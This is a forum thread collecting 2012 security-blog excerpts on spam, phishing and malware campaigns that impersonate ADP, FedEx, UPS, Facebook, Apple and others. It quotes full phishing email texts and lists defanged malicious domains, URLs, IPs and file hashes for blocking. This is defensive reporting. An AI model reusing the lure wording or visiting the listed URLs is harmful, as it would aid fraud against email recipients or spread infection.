SPAM frauds, fakes, and other MALWARE deliveries...

[AplusWebMaster]

FYI... multiple entries:

iPad SCAM ...
- http://www.gfi.com/blog/twitter-dm-l...-to-ipad-scam/
Oct 24, 2012 - "We have been reading reports of malware and phishing attacks by means of suspicious direct messages to get user systems infected or have user information and credentials stolen, a ploy that is fast becoming common in the Twittersphere now more than ever. One GFI Labs blog reader gave us the heads up on the latest DM currently making rounds on Twitter. The message says:
did you see your pics with her facebook(dot)com/45569965114786…
Users who click the embedded link are led to a Facebook app page, which then executes a PHP script—
> http://www.gfi.com/blog/wp-content/u...nd-traffic.png
... —before redirecting them to this:
> http://www.gfi.com/blog/wp-content/u...ge-300x181.jpg
It appears to be a genuine Facebook event page; however, the URL has made obvious that it’s not at all related to the said social networking site.
Depending on where users are in the US and UK, they are led to either a survey scam page or a phishing page once they click - Click here.:
> http://www.gfi.com/blog/wp-content/u...am-300x222.jpg
...
> http://www.gfi.com/blog/wp-content/u...ge-300x285.png
... Others are redirected to this ad campaign page we’re probably familiar with:
> http://www.gfi.com/blog/wp-content/u...ge-300x201.png
We have determined that more than 4,500 Internet users have visited the dodgy Facebook app page; however, it is unclear how many have fallen victim to these scams... quick reminder to our readers: think before you click..."
___

Contract SPAM / fidelocastroo .ru
- http://blog.dynamoo.com/2012/10/cont...castrooru.html
24 Oct 2012 - "This fake contact spam leads to malware on fidelocastroo .ru:
Date: Tue, 23 Oct 2012 12:33:51 -0800
From: "Wilburn TIMMONS" [HIWilburn@hotmail.com]
Subject: Fw: Contract from Wilburn
Attachments: Contract_Scan_DS23656.htm
Hello,
In the attached file I am transferring you the Translation of the Job Contract that I have just received today. I am really sorry for the delay.
Best regards,
Wilburn TIMMONS, secretary

The .htm attachment contains obfuscated javascript that attempts to direct the visitor to a malicious [donotclick]fidelocastroo .ru:8080/forum/links/column.php. This domain name has been used in several recent attacks and is currently multihomed on some familiar IP addresses:

202.3.245.13 (President of French Polynesia*)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)

* http://blog.dynamoo.com/2012/10/pres...polynesia.html ..."
___

Bogus Windows License SPAM - in the Wild
- http://www.gfi.com/blog/bogus-window...s-in-the-wild/
Oct 24, 2012 - "... Below is a screenshot of a new spam run in the wild... presents to recipients a very suspicious but very free license for Microsoft Windows that they can download. Sounds too good to be true? It probably is.
> http://www.gfi.com/blog/wp-content/u...22-300x124.png
From: {random email address}
Subject: Re: Fwd: Order N [redacted]
Message body:
Welcome,
You can download your Microsoft Windows License here -
Microsoft Corporation
Clicking the hyperlinked text leads recipients to a number of .ru websites hosting the file, page2.htm (screenshot below), which contains obfuscated JavaScript code that loads the Web page fidelocastroo(dot)ru(colon)8080/forums/links/column(dot)php.
> http://www.gfi.com/blog/wp-content/u...ole-300x83.png
This spam is a launchpad for a Blackhole-Cridex attack on user systems. This method is likewise being used by the most recent campaign of the “Copies of Policies” spam*, also in the wild..."
* http://gfisoftware.tumblr.com/tagged/Copies-of-Policies
___

Wire Transfer SPAM / ponowseniks .ru
- http://blog.dynamoo.com/2012/10/wire...wseniksru.html
24 Oct 2012 - "This fake wire transfer spam leads to malware on ponowseniks .ru:
Date: Wed, 24 Oct 2012 04:26:12 -0500
From: FedEx [info@emails.fedex.com]
Subject: Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 9649AA02)
Attachments: Report_Trans99252.htm
Dear Bank Operator,
WIRE TRANSFER: FEDW-30126495944197210
STATUS: REJECTED
You can find details in the attached file. (Internet Explorer format)

The .htm attachment attempts to redirect the user to a malicious page at [donotclick]ponowseniks .ru:8080/forum/links/column.php hosted on some familar IP addresses:
202.3.245.13 (President of French Polynesia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)"
___

BBB SPAM / samplersmagnifyingglass .net
- http://blog.dynamoo.com/2012/10/bbb-...gglassnet.html
24 Oct 2012 - "This fake BBB spam leads to malware on samplersmagnifyingglass .net:
Date: Wed, 24 Oct 2012 22:10:18 +0430
From: "Better Business Bureau" [noreply@bbb.org]
Subject: Better Business Beareau Appeal #42790699
Attention: Owner/Manager
Here with the Better Business Bureau notifies you that we have been sent a claim (ID 42790699) from one of your consumers about their dealership with you.
Please view the CLAIMS REPORT down to view more information on this problem and suggest us about your point of view as soon as possible.
On a website above please enter your complain id: 42790699 to review it.
We are looking forward to hearing from you.
-----------------------------------
Faithfully,
Rebecca Wilcox
Dispute advisor
Better Business Bureau

The malicious payload is on [donotclick]samplersmagnifyingglass .net/detects/confirming_absence_listing.php hosted on 183.81.133.121, a familiar IP address belonging to Vodafone in Fiji that has been used several times before and is well worth blocking."

[AplusWebMaster]

FYI... multiple entries:

Fake UPS emails serve malware ...
- http://blog.webroot.com/2012/10/25/y...serve-malware/
Oct 25, 2012 - "... cybercriminals launched yet another massive spam campaign, impersonating the United Parcel Service (UPS), in an attempt to trick its current and prospective customers into downloading and executing the malicious attachment found in the email. Upon execution, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete control over the victim’s host...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....il_malware.png
Detection rate for the malicious attachment: MD5: 0e78d3704332c59b619f872fd6d33d25 * ... Trojan-Downloader.Win32.Andromeda.qw.
* https://www.virustotal.com/file/d9e1...is/1350581761/
File name: UPS_Delivery_Confirmation.pdf.exe
Detection ratio: 32/43
Analysis date: 2012-10-18
___

Fake Facebook emails lead to malware
- https://www.net-security.org/malware_news.php?id=2302
25.10.2012 - "If you receive an email seemingly sent by Facebook, sharing an offensive comment that has seemingly been left on your Wall by an unknown user, please don't be tempted to follow the link.
> https://www.net-security.org/images/...nsive-scam.jpg
... If you do, you'll be -redirected- to a -fake- Facebook page hosting a malicious iFrame script that triggers the infamous Blackhole exploit kit, and if it finds a vulnerability to exploit, you will be automatically saddled with some or other malicious software. The attackers will try to hide the fact by automatically redirecting you to another legitimate Facebook page, belonging to a Facebook users that, according to Sophos*, does not seem to be related to the attack."
* http://nakedsecurity.sophos.com/2012...alware-attack/
___

ADP SPAM / openpolygons .net
- http://blog.dynamoo.com/2012/10/adp-...lygonsnet.html
25 Oct 2012 - "This fake ADP spam leads to malware on openpolygons .net:
From: warning @adp .com
Sent: Thu 25/10/2012 16:42
Subject: ADP Instant Message
ADP Pressing Communication
Reference No.: 27711
Respected ADP Client October, 25 2012
Your Transaction Report(s) have been uploaded to the web site:
Click Here to access
Please overview the following information:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This email was sent to existing users in your company that access ADP Netsecure.
As general, thank you for using ADP as your business affiliate!
Ref: 27711
> https://lh3.ggpht.com/-xEHpgbIAYcs/U...0/adp-spam.png

The malicious payload is at [donotclick]openpolygons .net/detects/lorrys_implication.php hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden) which is an IP address that has been seen before. That IP also hosts the fake AV application win8ss .com and another malware site of legacywins .com...
Plain list for copy-and-pasting:
195.198.124.60
openpolygons .net
win8ss .com
legacywins .com ..."
___

"End of Aug. Statement required" SPAM / kiladopje .ru
- http://blog.dynamoo.com/2012/10/end-...ired-spam.html
25 Oct 2012 - "This spam leads to malware on kiladopje .ru:
From: ZaireLomay @mail .com
Sent: 24 October 2012 20:58
Subject: Re: FW: End of Aug. Statement required
Hi,
as reqeusted I give you inovices issued to you per sept. (Internet Explorer format)
Regards

In this case, there's an attachment called Invoices-23-2012.htm with some obfuscated Javascript to direct visitors to a malware laden page at [donotclick]kiladopje .ru:8080/forum/links/column.php hosted on:
79.98.27.9 (Interneto Vizija, Lithunia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
The following IPs and domains are all related and should be blocked if you can:
68.67.42.41, 72.18.203.140, 79.98.27.9, 84.22.100.108, 85.143.166.170, 132.248.49.112, 190.10.14.196, 202.3.245.13, 203.80.16.81, 209.51.221.247
fidelocastroo .ru
finitolaco .ru
kennedyana .ru
kiladopje .ru
lemonadiom .ru
leprasmotra .ru
ponowseniks .ru
secondhand4u .ru
windowonu .ru ..."
___

Vast email -malware- outbreaks – efaxCorporate and Xerox copiers
- http://blog.commtouch.com/cafe/email...xerox-copiers/
Oct 25, 2012 - "... huge of amounts of email-attached malware distributed – all with an “office” theme. The attacks pushed the amount of email up by several hundred percent and totaled near five billion emails sent worldwide.
> http://blog.commtouch.com/cafe/wp-co...4-Oct-2012.jpg
The first part of the day saw emails describing an attachment as being the scan from a Xerox Workcenter... Yesterday’s file was a zipped executable. The second part of the attack moved on to eFaxCorporate, announcing the arrival of a (21 page) fax message. Once again the attachment was an executable file pretending to be a PDF. The file is detected as W32/Trojan2.NTLB... The malware scans the infected system for FTP programs – no doubt looking for FTP credentials that can be stolen to access and compromise Web servers (which can then be used to serve malware links).
> http://blog.commtouch.com/cafe/wp-co...ax-message.jpg ..."

[AplusWebMaster]

FYI... multiple entries:

Share of malicious email by country
- http://www.h-online.com/security/new...ew=zoom;zoom=1
26 Oct 2012
___

Bogus Skype emails lead to malware...
- http://blog.webroot.com/2012/10/26/b...ad-to-malware/
Oct 26, 2012 - "... millions of emails impersonating Skype, in an attempt to trick Skype users that their password has been successfully changed, and that in order to view their call history and change their account settings, they would need to execute the malicious attachment found in the emails...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....am_malware.png
Detection rate for the malicious attachment: MD5: 0e78d3704332c59b619f872fd6d33d25 * ... Trojan-Downloader.Win32.Andromeda.qw. Upon execution, the malware opens a backdoor allowing the cybercriminals behind the campaign complete access to the affected user’s host..."
* https://www.virustotal.com/file/d9e1...is/1350584221/
File name: Skype_Password_inscturtions.pdf.exe
Detection ratio: 32/43
Analysis date: 2012-10-18
___

apl.de.ap SPAM
- http://blog.dynamoo.com/2012/10/apldeap-spam.html
26 Oct 2012 - "I'm not really a fan of the Black Eyed Peas, so I'd never heard of apl.de.ap ( http://en.wikipedia.org/wiki/Apl.de.ap ) until I received this spam. I'm pretty sure that Mr ap isn't sending these out himself, but they're coming from a spammer in the UAE, a place which seems to be the spam capital of the middle east. Although those look like tinyurl links, they're not... they go through a redirector at ykadl .net on 109.236.88.71, the same IP used to send the spam... here's the spam in case you really want to buy tickets from a shady bunch of spammers (NOT)...
From: DNA alex @ ykadl .net
Date: 26 October 2012 04:48
Subject: Black Eyed Peas/ APL DE AP in Dubai
Signed by: ykadl.net
BLACK EYE PEAS founding member APL DE AP heads to Dubai
BLACK EYE PEAS founding member APL DE AP to Dubai for the first time.The internationally famed Black Eyed Peas rapper/DJ, who has won 7 Grammy Awards and sold over 70 million albums, will be the headliner performance at Nasimi Beach on Thursday 1st November.
Like his high school friend Will I Am, APL DE AP also DJ's with international bookings all around the globe including Ibiza, Cannes and London, recently headlining at Belgium's Tomorrowland Festival. The American-Philippines star headlines this event with support from Dion Mavath, local celebrity DJ Marwan Bliss/ 411, Mathew Charles and as well as a performance by Number One selling band Swickasswans.
APL DE AP and the other members of the Black Eyed Peas have been on a hiatus ..."
___

ADP SPAM / steamedboasting .info
- http://blog.dynamoo.com/2012/10/adp-...stinginfo.html
26 Oct 2012 - "This fake ADP spam leads to malware on steamedboasting.info:
From: ClientService @adp .com
Sent: 26 October 2012 12:03
Subject: ADP Instant Notification
ADP Urgent Warning
Reference #: 31344
Dear ADP Client October, 25 2012
Your Transfer Summary(s) have been uploaded to the web site:
https ://www.flexdirect.adp .com/client/login.aspx
Please take a look at the following information:
• Please note that your bank account will be charged within 1 banking day for the amount(s) specified on the Statement(s).
•Please DO NOT reply to this message. automative notification system cannot accept incoming messages. Please Contact your ADP Benefits Specialist.
This note was sent to existing users in your company that approach ADP Netsecure.
As always, thank you for choosing ADP as your business companion!
Ref: 31344

The malicious payload is at [donotclick]steamedboasting .info/detects/burying_releases-degree.php, the initial redirection page has some Cloudflare elements on it which is a bit disturbing. steamedboasting .info is hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden).
This is an alternative variant with the same malicious payload:
Date: Fri, 26 Oct 2012 16:32:10 +0530
From: "noreply @adp .com"
Subject: ADP Prompt Communication
ADP Speedy Notification
Reference #: 27585
Dear ADP Client October, 25 2012
Your Transaction Statement(s) have been put onto the web site:
Web site link
Please see the following notes:
• Please note that your bank account will be charged-off within 1 banking business day for the amount(s) specified on the Protocol(s).
?Please do not reply to this message. automative notification system can't accept incoming mail. Please Contact your ADP Benefits Specialist.
This message was sent to operating users in your company that approach ADP Netsecure.
As always, thank you for choosing ADP as your business partner!
Ref: 27585 [redacted] ..."
___

"Your Photos" SPAM / manekenppa .ru
- http://blog.dynamoo.com/2012/10/your...ekenpparu.html
26 Oct 2012 - "This fake "photos" spam leads to malware on manekenppa .ru:
From: Acacia @redacted .com
Sent: 26 October 2012 10:14
Subject: Your Photos
Hi,
I have attached your photos to the mail (Open with Internet Explorer).

In this case there is an attachment called Image_DIG691233.htm that leads to a malware laden page at [donotclick]manekenppa .ru:8080/forum/links/column.php hosted on some familiar looking IPs:
79.98.27.9 (Interneto Vizija, Lithunia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
We've seen these IPs before and they are well worth blocking."

[AplusWebMaster]

FYI...

Fake BT-Business emails lead to malware ...
- http://blog.webroot.com/2012/10/28/s...ad-to-malware/
Oct 28, 2012 - "Over the past 24 hours, cybercriminals have been spamvertising millions of emails targeting customers of BT’s Business Direct in an attempt to trick its users into executing the malicious attachment found in the emails. Upon executing it, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete access to the affected host...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....il_malware.png
Detection rate for the malicious attachment: MD5: 8d0e220ce56ebd5a03c389bedd116ac5 * ... Trojan-Ransom.Win32.Gimemo.ashm ..."
* https://www.virustotal.com/file/8f42...7c48/analysis/
File name: 8D0E220CE56EBD5A03C389BEDD116AC5.fil
Detection ratio: 32/42
Analysis date: 2012-10-25
___

Fake Verizon Wireless emails serve client-side exploits and malware ...
- http://blog.webroot.com/2012/10/27/c...s-and-malware/
Oct 27, 2012 - "... For over a week now, cybercriminals have been persistently spamvertising millions of emails impersonating the company, in an attempt to trick current and prospective customers into clicking on the client-side exploits and malware serving links found in the malicious email. Upon clicking on any of the links, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....ts_malware.png
Spamvertised malicious URLs:
hxxp ://coaseguros .com/components/com_ag_google_analytics2/notifiedvzn.html;
hxxp ://clinflows .com/components/com_ag_google_analytics2/vznnotifycheck.html
Client-side exploits serving URL: hxxp ://strangernaturallanguage .net/detects/notification-status_login.php?mzuilm=073707340a&awi=45&dawn=04083703023407370609&iwnjdt=0a000300040002
Sample client-side exploits served: CVE-2010-0188
Upon successful client-side exploitation, the campaign drops MD5: b8d6532dd17c3c6f91de5cc13266f374 * ... Trojan-Spy.Win32.Zbot.fkth
Once executed, the sample phones back to tuningmurcelagoglamour .ru, tuningfordmustangxtremee .ru - 146.185.220.28, AS58014 ..."
* https://www.virustotal.com/file/2d17...61f4/analysis/
File name: b8d6532dd17c3c6f91de5cc13266f374.malware
Detection ratio: 26/44
Analysis date: 2012-10-09 ..."

[AplusWebMaster]

FYI...

Fake British Airways emails serve malware
- http://blog.webroot.com/2012/10/29/c...serve-malware/
Oct 29, 2012 - "Cybercriminals are currently mass mailing millions of emails in an attempt to trick British Airways customers into executing the malicious attachment found in the spamvertised emails. Upon execution, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete control over the infected host...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....il_malware.png
Detection rate for the malicious attachment: MD5: 4a3a345c24fda6987bbe5411269e26b7 * ... Trojan-Downloader.Win32.Andromeda.aey..."
* https://www.virustotal.com/file/39f5...5c21/analysis/
File name: BritishAirways-eticket.pdf.exe
Detection ratio: 30/43
Analysis date: 2012-10-23
___

.com malware pretends to be naughty .com website
- http://blog.commtouch.com/cafe/email...y-com-website/
Oct 28, 2012 - "... The email doesn’t include much text – simply asking that you 'Pay attention at the attach':
Screenshot: http://blog.commtouch.com/cafe/wp-co...ck-blurred.jpg
... As shown in the screenshot it’s www .——-face .com. Those tempted to double-click the “link” in order to visit a porn site would find themselves attacked by malware."

[AplusWebMaster]

FYI...

Bogus Facebook notifications serve malware
- http://blog.webroot.com/2012/10/30/c...serve-malware/
Oct 30, 2012 - "... cybercriminals spamvertised yet another massive email campaign, impersonating the world’s most popular social network – Facebook. It was similar to a previously profiled spam campaign imitating Facebook. However, in this case the cybercriminals behind it relied on attached malicious archives, compared to including exploits and malware serving links in the email...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....il_malware.png
Detection rate for the malicious archive: MD5: 0938302fbf8f7db161e46c558660ae0b * ... Trojan.Generic.KDV.753880; Trojan-Ransom.Win32.Gimemo.arsu. Upon execution, the sample opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain full access to the affected host..."
* https://www.virustotal.com/file/79f9...is/1350575670/
File name: FacebookPhoto_album.jpeg.exe
Detection ratio: 34/43
Analysis date: 2012-10-18
___

Blackhat SEO poisoning: Halloween tricks and holiday malware ...
- http://blogs.computerworld.com/cyber...ware-interview
Oct 29, 2012 - "... things like blackhat SEO poisoning to successfully infect devices. Blackhat SEO link poisoning, scams, tricks. Although the poisonous pranks and tainted tricks go far beyond Halloween, this seemed a great time to get insight into these trends as well as tips to avoid them. You might know about it, but how about your parents or other people who are not nearly so security-savvy? You might want to warn them that their simple searches could infect their computers... especially if you will be the one called upon to fix them for free ;-) ..."
(More detail at the URL above.)

[AplusWebMaster]

FYI... multiple entries:

Twitter phish is selling drama
- http://www.gfi.com/blog/new-twitter-...selling-drama/
Oct 30, 2012 - "... new phish in Twitter... you won’t miss it once you visit your direct message (DM) inbox. The message content can be any of the following:
- A horrible rumor is spreading about you
- A nasty rumor is spreading about you
- A terrible rumor is spreading about you
- You see this video of someone taping you? [URL redacted] creep
- Hey you hear about the gossip your mentioned in? it started some serious drama, it fired up a lot of people on [URL redacted] sNqp

Whatever the message, it carries a shortened URL that directs the recipient to the domain ivtwtter(dot)com once clicked. Fortunately, the domain is no longer active.
> http://www.gfi.com/blog/wp-content/u...tter-phish.png
Web browsers have also flagged the URL as a phishing site. If you receive any of these messages (or similar), the best way to handle it is to simply delete it from your DM inbox and warn your followers. In warning them, don’t copy and paste the entire message you received with the live link still in it — as some are prone to do — because this just increases the possibility of the nefarious link getting clicked..."
___

"Your Apple ID has been disabled" phish
- http://blog.dynamoo.com/2012/10/your...led-phish.html
31 Oct 2012 - "I've never seen one quite like this before, although it's not the first time I've seen Apple-themed scam emails...
From: Apple no_reply @ macapple .com
Reply-To: no_reply @ macapple .com
Date: 31 October 2012 06:08
Subject: Your Apple ID has been disabled
Apple ID Support
Dear [redacted] ,
This Apple ID has been disabled!
For your protection, your Apple ID ([redacted]) is automatically disabled. We detect unauthorized Login Attempts to your Apple ID from other IP Location. Please verify your identity today or your account will be disabled due to concerns we have for the safety and integrity of the Apple Community.
To verify your Apple ID, we recommend that you go to:
Verify Now >

The phish is hosted at [donotclick]app.apple .com.proiectmaxim .ro/id2/sign_in/login_ID&=/?&=?reactivate=[redacted] and it looks pretty convincing if you haven't spotted the Romanian domain name... It just goes to show that the bad guys will try to phish -anything- these days."
___

HP ScanJet SPAM / donkihotik .ru
- http://blog.dynamoo.com/2012/10/hp-s...kihotikru.html
31 Oct 2012 - "This fake printer message leads to malware on donkihotik .ru:
Date: Wed, 31 Oct 2012 05:06:42 +0300
From: LinkedIn Connections
Subject: Re: Fwd:Scan from a HP ScanJet #26531
Attachments: HP-Scan-44974.htm
Attached document was scanned and sent
to you using a Hewlett-Packard Officejet PRO.
Sent: by Bria
Image(s) : 6
Attachment: Internet Explorer file [.htm]
Hewlett-Packard Officejet Location: machine location not set

The malicious payload is at [donotclick]donkihotik .ru:8080/forum/links/column.php which is hosted on the same IP addresses as this attack* yesterday."
* http://blog.dynamoo.com/2012/10/crai...ionadixru.html
"... some familiar IPs:
68.67.42.41 (Fibrenoire, Canada)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, United States)
Additional name server IPs:
50.22.102.132 (Softlayer, United States)
62.76.186.190 (Clodo-Cloud, Russia)
84.22.100.108 (Cyberbunker, Netherlands)
213.251.171.30 (OVH, France)
Plain list for copy-and-pasting:
50.22.102.132
62.76.186.190
68.67.42.41
84.22.100.108
203.80.16.81
209.51.221.247
213.251.171.30
manekenppa.ru
kiladopje.ru
lemonadiom.ru
finitolaco.ru
fidelocastroo.ru
ponowseniks.ru
dianadrau.ru
windowonu.ru
panalkinew.ru
fionadix.ru ..."
___

Steam phish steals more than credentials
- http://www.gfi.com/blog/new-phish-st...m-credentials/
Oct 31, 2012 - "... targeting players of the popular gaming platform, Steam. More than a year ago, Valve launched Steam Trading. The objective is to “allows you [the Steam account owner] to exchange In-game items and Gifts with everybody in the Steam Community.” It is a good move to get people within their large gaming community to engage with one another and form a bond of camaraderie. Upon its launch, Steam can only cater to a number of gamers. In particular, those who play Team Fortress 2, Portal, Spiral Knights, and other games from Three Rings and SEGA... phishing page that mimics the look and feel of the actual news page announcing the launch. The -bogus- page -baits- unknowing users with one free game this “Steam Happy Day”... at this time of writing Chrome flags the site as a phish... If you play Team Fortress 2, Portal, Spiral Knights plus other SEGA games on Steam and regularly trades items with other players, please avoid and block days(dot)steamgamesgift(dot)yzi(dot)me ... Be wary of free games and offers that would cost you more than you want to bargain for, especially if they’re hosted on dubious sites that use familiar strings in URLs you’d normally see in legitimate sites. To be safe, visit Steam directly* to double-check if they indeed have free offers..."
* http://store.steampowered.com/